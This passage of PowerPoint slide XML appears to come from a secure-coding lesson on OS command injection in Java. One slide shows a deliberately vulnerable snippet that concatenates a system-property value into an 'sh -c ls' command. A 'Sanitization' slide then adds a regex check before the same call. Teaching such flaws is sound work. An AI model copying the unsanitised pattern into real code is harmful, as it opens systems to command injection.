              <a:t>System.getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("dir");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (new File(dir).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> throw new IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>directory");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Process proc = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  new String[] {"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "-c", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> " + dir}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="1728527"/>
            <a:ext cx="4572000" cy="477696"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17960"/>
              <a:gd name="adj2" fmla="val 85736"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensures that command succeeds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294785358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Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String dir = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.getProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("dir");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir.matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(".*\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.*") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> throw new IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Invalid input");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Process proc = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rt.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  new String[] {"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "-c", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
